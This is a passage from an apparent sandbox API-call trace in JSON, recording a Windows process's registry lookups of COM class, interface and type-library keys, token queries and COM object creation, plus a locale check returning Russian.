"0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000376" }, { "name": "ObjectAttributesName", "value": "InprocHandler" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler" } ], "repeated": 0, "id": 880 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000376" }, { "name": "SubKey", "value": "LocalServer32" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer32" } ], "repeated": 0, "id": 881 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000376" }, { "name": "ValueName", "value": "AppID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\AppID" } ], "repeated": 0, "id": 882 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 883 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 884 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": " j\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00 k\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 885 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer" } ], "repeated": 0, "id": 886 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 887 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000376" }, { "name": "ObjectAttributesName", "value": "LocalServer" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer" } ], "repeated": 0, "id": 888 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c6" }, { "name": "SubKey", "value": "CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "Handle", "value": "0x0000037a" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" } ], "repeated": 0, "id": 889 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000037a" }, { "name": "SubKey", "value": "Elevation" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\Elevation" } ], "repeated": 0, "id": 890 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" } ], "repeated": 0, "id": 891 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" } ], "repeated": 0, "id": 892 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c2" }, { "name": "SubKey", "value": "CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "Handle", "value": "0x00000376" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" } ], "repeated": 0, "id": 893 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000376" }, { "name": "SubKey", "value": "TreatAs" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs" } ], "repeated": 0, "id": 894 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" } ], "repeated": 0, "id": 895 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 896 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d8" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 897 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 898 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 899 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d8" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 900 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 901 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 902 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000033c" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 903 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c2" }, { "name": "SubKey", "value": "Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}" }, { "name": "Handle", "value": "0x0000036e" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}" } ], "repeated": 0, "id": 904 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000036e" }, { "name": "SubKey", "value": "ProxyStubClsid32" }, { "name": "Handle", "value": "0x00000372" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32" } ], "repeated": 0, "id": 905 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "{7C857801-7381-11CF-884D-00AA004B2E24}" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)" } ], "repeated": 0, "id": 906 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" } ], "repeated": 0, "id": 907 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000036e" } ], "repeated": 0, "id": 908 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 909 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d8" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 910 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 911 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000033c" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 912 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c2" }, { "name": "SubKey", "value": "Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}" }, { "name": "Handle", "value": "0x00000376" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}" } ], "repeated": 0, "id": 913 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000376" }, { "name": "SubKey", "value": "ProxyStubClsid32" }, { "name": "Handle", "value": "0x0000037a" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32" } ], "repeated": 0, "id": 914 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "{7C857801-7381-11CF-884D-00AA004B2E24}" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)" } ], "repeated": 0, "id": 915 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" } ], "repeated": 0, "id": 916 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" } ], "repeated": 0, "id": 917 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 918 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d8" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 919 }, { "timestamp": "2025-11-20 10:58:29,797", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000419", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000419" }, { "name": "LanguageName", "value": "Russian" } ], "repeated": 0, "id": 920 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000346-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "E085AD58-B839-4625-B40B-4CC546E82D75" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 921 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020119", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom" } ], "repeated": 0, "id": 922 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000374" } ], "repeated": 0, "id": 923 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "20" }, { "name": "TokenInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 924 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "18" }, { "name": "TokenInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 925 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\x9d\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\xf0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x9e\\x7f\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 926 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000378" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\User\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes" } ], "repeated": 0, "id": 927 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000374" } ], "repeated": 0, "id": 928 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037a" }, { "name": "SubKey", "value": "TypeLib" }, { "name": "Handle", "value": "0x00000376" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib" } ], "repeated": 0, "id": 929 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" } ], "repeated": 0, "id": 930 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000376" }, { "name": "SubKey", "value": "{565783C6-CB41-11D1-8B02-00600806D9B6}" }, { "name": "Handle", "value": "0x0000037a" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}" } ], "repeated": 0, "id": 931 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000037a" }, { "name": "SubKey", "value": "1.0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.0" } ], "repeated": 0, "id": 932 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegEnumKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "1.2" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2" } ], "repeated": 0, "id": 933 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegEnumKeyExW", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\" } ], "repeated": 0, "id": 934 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037a" }, { "name": "SubKey", "value": "1.2" }, { "name": "Handle", "value": "0x0000037e" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2" } ], "repeated": 0, "id": 935 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000037e" }, { "name": "SubKey", "value": "419" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\419" } ], "repeated": 0, "id": 936 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000037e" }, { "name": "SubKey", "value": "19" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\19" } ], "repeated": 0, "id": 937 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037e" }, { "name": "SubKey", "value": "0" }, { "name": "Handle", "value": "0x00000382" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0" } ], "repeated": 0, "id": 938 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000382" }, { "name": "SubKey", "value": "win64" }, { "name": "Handle", "value": "0x00000386" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" } ], "repeated": 0, "id": 939 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000386" } ], "repeated": 0, "id": 940 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000382" } ], "repeated": 0, "id": 941 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037e" }, { "name": "SubKey", "value": "0" }, { "name": "Handle", "value": "0x00000382" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0" } ], "repeated": 0, "id": 942 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000382" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, 